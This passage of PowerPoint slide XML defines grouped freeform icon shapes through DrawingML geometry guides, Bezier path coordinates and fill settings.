                    <a:pt x="35" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="53"/>
                    <a:pt x="29" y="53"/>
                    <a:pt x="25"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99" name="Freeform 1038">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAAFE10F-F5D5-FF40-9B6D-B4782E9464F7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10388039" y="4336717"/>
              <a:ext cx="191382" cy="83628"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 455 w 480"/>
                <a:gd name="T1" fmla="*/ 211 h 211"/>
                <a:gd name="T2" fmla="*/ 25 w 480"/>
                <a:gd name="T3" fmla="*/ 211 h 211"/>
                <a:gd name="T4" fmla="*/ 0 w 480"/>
                <a:gd name="T5" fmla="*/ 185 h 211"/>
                <a:gd name="T6" fmla="*/ 0 w 480"/>
                <a:gd name="T7" fmla="*/ 25 h 211"/>
                <a:gd name="T8" fmla="*/ 25 w 480"/>
                <a:gd name="T9" fmla="*/ 0 h 211"/>
                <a:gd name="T10" fmla="*/ 455 w 480"/>
                <a:gd name="T11" fmla="*/ 0 h 211"/>
                <a:gd name="T12" fmla="*/ 480 w 480"/>
                <a:gd name="T13" fmla="*/ 25 h 211"/>
                <a:gd name="T14" fmla="*/ 480 w 480"/>
                <a:gd name="T15" fmla="*/ 185 h 211"/>
                <a:gd name="T16" fmla="*/ 455 w 480"/>
                <a:gd name="T17" fmla="*/ 211 h 211"/>
                <a:gd name="T18" fmla="*/ 51 w 480"/>
                <a:gd name="T19" fmla="*/ 160 h 211"/>
                <a:gd name="T20" fmla="*/ 430 w 480"/>
                <a:gd name="T21" fmla="*/ 160 h 211"/>
                <a:gd name="T22" fmla="*/ 430 w 480"/>
                <a:gd name="T23" fmla="*/ 50 h 211"/>
                <a:gd name="T24" fmla="*/ 51 w 480"/>
                <a:gd name="T25" fmla="*/ 50 h 211"/>
                <a:gd name="T26" fmla="*/ 51 w 480"/>
                <a:gd name="T27" fmla="*/ 16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0" h="211">
                  <a:moveTo>
                    <a:pt x="455" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="211"/>
                    <a:pt x="25" y="211"/>
                    <a:pt x="25" y="211"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="211"/>
                    <a:pt x="0" y="199"/>
                    <a:pt x="0" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="25"/>
                    <a:pt x="0" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="11"/>
                    <a:pt x="11" y="0"/>
                    <a:pt x="25" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="455" y="0"/>
                    <a:pt x="455" y="0"/>
                    <a:pt x="455" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="469" y="0"/>
                    <a:pt x="480" y="11"/>
                    <a:pt x="480" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="185"/>
                    <a:pt x="480" y="185"/>
                    <a:pt x="480" y="185"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="480" y="199"/>
                    <a:pt x="469" y="211"/>
                    <a:pt x="455" y="211"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="51" y="160"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="430" y="160"/>
                    <a:pt x="430" y="160"/>
                    <a:pt x="430" y="160"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="430" y="50"/>
                    <a:pt x="430" y="50"/>
                    <a:pt x="430" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="50"/>
                    <a:pt x="51" y="50"/>
                    <a:pt x="51" y="50"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="1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100" name="Freeform 1039">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89134871-7A87-0540-8AC7-D99A0F373E4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10428245" y="4282038"/>
              <a:ext cx="110969" cy="75588"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 248 w 277"/>
                <a:gd name="T1" fmla="*/ 187 h 187"/>
                <a:gd name="T2" fmla="*/ 29 w 277"/>
                <a:gd name="T3" fmla="*/ 187 h 187"/>
                <a:gd name="T4" fmla="*/ 4 w 277"/>
                <a:gd name="T5" fmla="*/ 162 h 187"/>
                <a:gd name="T6" fmla="*/ 2 w 277"/>
                <a:gd name="T7" fmla="*/ 153 h 187"/>
                <a:gd name="T8" fmla="*/ 0 w 277"/>
                <a:gd name="T9" fmla="*/ 135 h 187"/>
                <a:gd name="T10" fmla="*/ 138 w 277"/>
                <a:gd name="T11" fmla="*/ 0 h 187"/>
                <a:gd name="T12" fmla="*/ 277 w 277"/>
                <a:gd name="T13" fmla="*/ 135 h 187"/>
                <a:gd name="T14" fmla="*/ 274 w 277"/>
                <a:gd name="T15" fmla="*/ 153 h 187"/>
                <a:gd name="T16" fmla="*/ 273 w 277"/>
                <a:gd name="T17" fmla="*/ 162 h 187"/>
                <a:gd name="T18" fmla="*/ 248 w 277"/>
                <a:gd name="T19" fmla="*/ 187 h 187"/>
                <a:gd name="T20" fmla="*/ 51 w 277"/>
                <a:gd name="T21" fmla="*/ 137 h 187"/>
                <a:gd name="T22" fmla="*/ 226 w 277"/>
                <a:gd name="T23" fmla="*/ 137 h 187"/>
                <a:gd name="T24" fmla="*/ 226 w 277"/>
                <a:gd name="T25" fmla="*/ 135 h 187"/>
                <a:gd name="T26" fmla="*/ 138 w 277"/>
                <a:gd name="T27" fmla="*/ 51 h 187"/>
                <a:gd name="T28" fmla="*/ 50 w 277"/>
                <a:gd name="T29" fmla="*/ 135 h 187"/>
                <a:gd name="T30" fmla="*/ 51 w 277"/>
                <a:gd name="T31" fmla="*/ 137 h 187"/>
                <a:gd name="T32" fmla="*/ 251 w 277"/>
                <a:gd name="T33" fmla="*/ 135 h 187"/>
                <a:gd name="T34" fmla="*/ 252 w 277"/>
                <a:gd name="T35" fmla="*/ 135 h 187"/>
                <a:gd name="T36" fmla="*/ 251 w 277"/>
                <a:gd name="T37" fmla="*/ 13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7" h="187">
                  <a:moveTo>
                    <a:pt x="248" y="187"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="187"/>
                    <a:pt x="29" y="187"/>
                    <a:pt x="29" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="187"/>
                    <a:pt x="4" y="176"/>
                    <a:pt x="4" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="160"/>
                    <a:pt x="3" y="157"/>
                    <a:pt x="2" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="147"/>
                    <a:pt x="0" y="140"/>
                    <a:pt x="0" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="62"/>
                    <a:pt x="63" y="0"/>
                    <a:pt x="138" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="213" y="0"/>
                    <a:pt x="277" y="62"/>
                    <a:pt x="277" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="140"/>
                    <a:pt x="276" y="147"/>
                    <a:pt x="274" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="157"/>
                    <a:pt x="273" y="160"/>
                    <a:pt x="273" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="176"/>
                    <a:pt x="261" y="187"/>
                    <a:pt x="248" y="187"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="51" y="137"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="137"/>
                    <a:pt x="226" y="137"/>
                    <a:pt x="226" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="136"/>
                    <a:pt x="226" y="135"/>
                    <a:pt x="226" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="226" y="89"/>
                    <a:pt x="186" y="51"/>
                    <a:pt x="138" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="91" y="51"/>
                    <a:pt x="50" y="89"/>
                    <a:pt x="50" y="135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="135"/>
                    <a:pt x="50" y="136"/>
                    <a:pt x="51" y="137"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="251" y="135"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="135"/>
                    <a:pt x="252" y="135"/>
                    <a:pt x="252" y="135"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="251"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101" name="Freeform 1040">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{163DC605-65DF-094D-B6D6-C2764DCDDC6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10371957" y="4526489"/>
              <a:ext cx="336124" cy="334514"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 441 w 843"/>
                <a:gd name="T1" fmla="*/ 842 h 842"/>
                <a:gd name="T2" fmla="*/ 157 w 843"/>
                <a:gd name="T3" fmla="*/ 725 h 842"/>
                <a:gd name="T4" fmla="*/ 157 w 843"/>
                <a:gd name="T5" fmla="*/ 156 h 842"/>
                <a:gd name="T6" fmla="*/ 725 w 843"/>
                <a:gd name="T7" fmla="*/ 156 h 842"/>
                <a:gd name="T8" fmla="*/ 725 w 843"/>
                <a:gd name="T9" fmla="*/ 156 h 842"/>
                <a:gd name="T10" fmla="*/ 725 w 843"/>
                <a:gd name="T11" fmla="*/ 156 h 842"/>
                <a:gd name="T12" fmla="*/ 843 w 843"/>
                <a:gd name="T13" fmla="*/ 441 h 842"/>
                <a:gd name="T14" fmla="*/ 725 w 843"/>
                <a:gd name="T15" fmla="*/ 725 h 842"/>
                <a:gd name="T16" fmla="*/ 441 w 843"/>
                <a:gd name="T17" fmla="*/ 842 h 842"/>
                <a:gd name="T18" fmla="*/ 441 w 843"/>
                <a:gd name="T19" fmla="*/ 89 h 842"/>
                <a:gd name="T20" fmla="*/ 192 w 843"/>
                <a:gd name="T21" fmla="*/ 192 h 842"/>
                <a:gd name="T22" fmla="*/ 192 w 843"/>
                <a:gd name="T23" fmla="*/ 689 h 842"/>
                <a:gd name="T24" fmla="*/ 689 w 843"/>
                <a:gd name="T25" fmla="*/ 689 h 842"/>
                <a:gd name="T26" fmla="*/ 792 w 843"/>
                <a:gd name="T27" fmla="*/ 441 h 842"/>
                <a:gd name="T28" fmla="*/ 689 w 843"/>
                <a:gd name="T29" fmla="*/ 192 h 842"/>
                <a:gd name="T30" fmla="*/ 689 w 843"/>
                <a:gd name="T31" fmla="*/ 192 h 842"/>
                <a:gd name="T32" fmla="*/ 441 w 843"/>
                <a:gd name="T33" fmla="*/ 89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3" h="842">
                  <a:moveTo>
                    <a:pt x="441" y="842"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="842"/>
                    <a:pt x="235" y="803"/>
                    <a:pt x="157" y="725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="568"/>
                    <a:pt x="0" y="313"/>
                    <a:pt x="157" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="313" y="0"/>
                    <a:pt x="568" y="0"/>
                    <a:pt x="725" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="725" y="156"/>
                    <a:pt x="725" y="156"/>
                    <a:pt x="725" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="725" y="156"/>
                    <a:pt x="725" y="156"/>
                    <a:pt x="725" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="801" y="232"/>
                    <a:pt x="843" y="333"/>
                    <a:pt x="843" y="441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="843" y="548"/>
                    <a:pt x="801" y="649"/>
                    <a:pt x="725" y="725"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="647" y="803"/>
                    <a:pt x="544" y="842"/>
                    <a:pt x="441" y="842"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="441" y="89"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="89"/>
                    <a:pt x="261" y="124"/>
                    <a:pt x="192" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="329"/>
                    <a:pt x="55" y="552"/>
                    <a:pt x="192" y="689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="329" y="826"/>
                    <a:pt x="552" y="826"/>
                    <a:pt x="689" y="689"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="756" y="623"/>
                    <a:pt x="792" y="534"/>
                    <a:pt x="792" y="441"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="792" y="347"/>
                    <a:pt x="756" y="259"/>
                    <a:pt x="689" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="689" y="192"/>
                    <a:pt x="689" y="192"/>
                    <a:pt x="689" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="621" y="124"/>
                    <a:pt x="531" y="89"/>
                    <a:pt x="441"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102" name="Freeform 1041">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB363B48-D57F-1946-A016-47A88CE0DE48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10643751" y="4798284"/>
              <a:ext cx="57897" cy="56289"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 143"/>
                <a:gd name="T1" fmla="*/ 140 h 140"/>
                <a:gd name="T2" fmla="*/ 97 w 143"/>
                <a:gd name="T3" fmla="*/ 133 h 140"/>
                <a:gd name="T4" fmla="*/ 10 w 143"/>
                <a:gd name="T5" fmla="*/ 46 h 140"/>
                <a:gd name="T6" fmla="*/ 10 w 143"/>
                <a:gd name="T7" fmla="*/ 10 h 140"/>
                <a:gd name="T8" fmla="*/ 46 w 143"/>
                <a:gd name="T9" fmla="*/ 10 h 140"/>
                <a:gd name="T10" fmla="*/ 133 w 143"/>
                <a:gd name="T11" fmla="*/ 97 h 140"/>
                <a:gd name="T12" fmla="*/ 133 w 143"/>
                <a:gd name="T13" fmla="*/ 133 h 140"/>
                <a:gd name="T14" fmla="*/ 115 w 143"/>
                <a:gd name="T15" fmla="*/ 140 h 1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 h="140">
                  <a:moveTo>
                    <a:pt x="115" y="140"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="140"/>
                    <a:pt x="102" y="138"/>
                    <a:pt x="97" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="46"/>
                    <a:pt x="10" y="46"/>
                    <a:pt x="10" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="36"/>
                    <a:pt x="0" y="20"/>
                    <a:pt x="10" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="0"/>
                    <a:pt x="36" y="0"/>
                    <a:pt x="46" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="97"/>
                    <a:pt x="133" y="97"/>
                    <a:pt x="133" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="107"/>
                    <a:pt x="143" y="123"/>
                    <a:pt x="133" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="138"/>
                    <a:pt x="122" y="140"/>
                    <a:pt x="115"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103" name="Freeform 1042">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6E744D2-07EF-5240-9A59-E464A9FBA31B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10672699" y="4827231"/>
              <a:ext cx="180123" cy="175299"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 333 w 450"/>
                <a:gd name="T1" fmla="*/ 440 h 440"/>
                <a:gd name="T2" fmla="*/ 258 w 450"/>
                <a:gd name="T3" fmla="*/ 409 h 440"/>
                <a:gd name="T4" fmla="*/ 41 w 450"/>
                <a:gd name="T5" fmla="*/ 191 h 440"/>
                <a:gd name="T6" fmla="*/ 41 w 450"/>
                <a:gd name="T7" fmla="*/ 41 h 440"/>
                <a:gd name="T8" fmla="*/ 191 w 450"/>
                <a:gd name="T9" fmla="*/ 41 h 440"/>
                <a:gd name="T10" fmla="*/ 408 w 450"/>
                <a:gd name="T11" fmla="*/ 259 h 440"/>
                <a:gd name="T12" fmla="*/ 408 w 450"/>
                <a:gd name="T13" fmla="*/ 409 h 440"/>
                <a:gd name="T14" fmla="*/ 333 w 450"/>
                <a:gd name="T15" fmla="*/ 440 h 440"/>
                <a:gd name="T16" fmla="*/ 116 w 450"/>
                <a:gd name="T17" fmla="*/ 61 h 440"/>
                <a:gd name="T18" fmla="*/ 77 w 450"/>
                <a:gd name="T19" fmla="*/ 77 h 440"/>
                <a:gd name="T20" fmla="*/ 77 w 450"/>
                <a:gd name="T21" fmla="*/ 156 h 440"/>
                <a:gd name="T22" fmla="*/ 294 w 450"/>
                <a:gd name="T23" fmla="*/ 373 h 440"/>
                <a:gd name="T24" fmla="*/ 372 w 450"/>
                <a:gd name="T25" fmla="*/ 373 h 440"/>
                <a:gd name="T26" fmla="*/ 372 w 450"/>
                <a:gd name="T27" fmla="*/ 295 h 440"/>
                <a:gd name="T28" fmla="*/ 155 w 450"/>
                <a:gd name="T29" fmla="*/ 77 h 440"/>
                <a:gd name="T30" fmla="*/ 116 w 450"/>
                <a:gd name="T31" fmla="*/ 61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0" h="440">
                  <a:moveTo>
                    <a:pt x="333" y="440"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="306" y="440"/>
                    <a:pt x="279" y="430"/>
                    <a:pt x="258" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="191"/>
                    <a:pt x="41" y="191"/>
                    <a:pt x="41" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="150"/>
                    <a:pt x="0" y="83"/>
                    <a:pt x="41" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="0"/>
                    <a:pt x="149" y="0"/>
                    <a:pt x="191" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="408" y="259"/>
                    <a:pt x="408" y="259"/>
                    <a:pt x="408" y="259"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="450" y="300"/>
                    <a:pt x="450" y="368"/>
                    <a:pt x="408" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="430"/>
                    <a:pt x="360" y="440"/>
                    <a:pt x="333" y="440"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="61"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="61"/>
                    <a:pt x="87" y="67"/>
                    <a:pt x="77" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="99"/>
                    <a:pt x="55" y="134"/>
                    <a:pt x="77" y="156"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="373"/>
                    <a:pt x="294" y="373"/>
                    <a:pt x="294" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="395"/>
                    <a:pt x="351" y="395"/>
                    <a:pt x="372" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="394" y="351"/>
                    <a:pt x="394" y="316"/>
                    <a:pt x="372" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="77"/>
                    <a:pt x="155" y="77"/>
                    <a:pt x="155" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="67"/>
                    <a:pt x="130" y="61"/>
                    <a:pt x="11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grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34F503D4-130B-CB46-906E-7D30F4395E72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8406350" y="1854391"/>
            <a:ext cx="425105" cy="422252"/>
            <a:chOff x="8406350" y="1854391"/>
            <a:chExt cx="425105" cy="422252"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="126" name="Freeform 765">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A1CA70D-3080-7B4C-A97D-A9A74D2E2271}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8617476" y="1854391"/>
              <a:ext cx="84641" cy="67522"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 163 w 353"/>
                <a:gd name="T1" fmla="*/ 284 h 284"/>
                <a:gd name="T2" fmla="*/ 140 w 353"/>
                <a:gd name="T3" fmla="*/ 270 h 284"/>
                <a:gd name="T4" fmla="*/ 152 w 353"/>
                <a:gd name="T5" fmla="*/ 235 h 284"/>
                <a:gd name="T6" fmla="*/ 268 w 353"/>
                <a:gd name="T7" fmla="*/ 179 h 284"/>
                <a:gd name="T8" fmla="*/ 18 w 353"/>
                <a:gd name="T9" fmla="*/ 53 h 284"/>
                <a:gd name="T10" fmla="*/ 7 w 353"/>
                <a:gd name="T11" fmla="*/ 18 h 284"/>
                <a:gd name="T12" fmla="*/ 42 w 353"/>
                <a:gd name="T13" fmla="*/ 7 h 284"/>
                <a:gd name="T14" fmla="*/ 339 w 353"/>
                <a:gd name="T15" fmla="*/ 157 h 284"/>
                <a:gd name="T16" fmla="*/ 353 w 353"/>
                <a:gd name="T17" fmla="*/ 180 h 284"/>
                <a:gd name="T18" fmla="*/ 338 w 353"/>
                <a:gd name="T19" fmla="*/ 203 h 284"/>
                <a:gd name="T20" fmla="*/ 174 w 353"/>
                <a:gd name="T21" fmla="*/ 282 h 284"/>
                <a:gd name="T22" fmla="*/ 163 w 353"/>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284">
                  <a:moveTo>
                    <a:pt x="163" y="284"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="284"/>
                    <a:pt x="144" y="279"/>
                    <a:pt x="140" y="270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134" y="257"/>
                    <a:pt x="139" y="241"/>
                    <a:pt x="152" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="268" y="179"/>
                    <a:pt x="268" y="179"/>
                    <a:pt x="268" y="179"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="53"/>
                    <a:pt x="18" y="53"/>
                    <a:pt x="18" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="47"/>
                    <a:pt x="0" y="31"/>
                    <a:pt x="7" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="6"/>
                    <a:pt x="29" y="0"/>
                    <a:pt x="42" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339" y="157"/>
                    <a:pt x="339" y="157"/>
                    <a:pt x="339" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="161"/>
                    <a:pt x="353" y="170"/>
                    <a:pt x="353" y="180"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="190"/>
                    <a:pt x="347" y="199"/>
                    <a:pt x="338" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="282"/>
                    <a:pt x="174" y="282"/>
                    <a:pt x="174" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="284"/>
                    <a:pt x="167" y="284"/>
                    <a:pt x="163" y="284"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>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127" name="Freeform 767">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AF44B1A-EC18-F842-B21A-681A6739D0A1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8540444" y="1855342"/>
              <a:ext cx="99857" cy="87494"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 333 w 421"/>
                <a:gd name="T1" fmla="*/ 371 h 371"/>
                <a:gd name="T2" fmla="*/ 322 w 421"/>
                <a:gd name="T3" fmla="*/ 368 h 371"/>
                <a:gd name="T4" fmla="*/ 15 w 421"/>
                <a:gd name="T5" fmla="*/ 215 h 371"/>
                <a:gd name="T6" fmla="*/ 0 w 421"/>
                <a:gd name="T7" fmla="*/ 192 h 371"/>
                <a:gd name="T8" fmla="*/ 15 w 421"/>
                <a:gd name="T9" fmla="*/ 169 h 371"/>
                <a:gd name="T10" fmla="*/ 344 w 421"/>
                <a:gd name="T11" fmla="*/ 6 h 371"/>
                <a:gd name="T12" fmla="*/ 378 w 421"/>
                <a:gd name="T13" fmla="*/ 17 h 371"/>
                <a:gd name="T14" fmla="*/ 367 w 421"/>
                <a:gd name="T15" fmla="*/ 52 h 371"/>
                <a:gd name="T16" fmla="*/ 84 w 421"/>
                <a:gd name="T17" fmla="*/ 192 h 371"/>
                <a:gd name="T18" fmla="*/ 333 w 421"/>
                <a:gd name="T19" fmla="*/ 316 h 371"/>
                <a:gd name="T20" fmla="*/ 379 w 421"/>
                <a:gd name="T21" fmla="*/ 292 h 371"/>
                <a:gd name="T22" fmla="*/ 414 w 421"/>
                <a:gd name="T23" fmla="*/ 303 h 371"/>
                <a:gd name="T24" fmla="*/ 403 w 421"/>
                <a:gd name="T25" fmla="*/ 338 h 371"/>
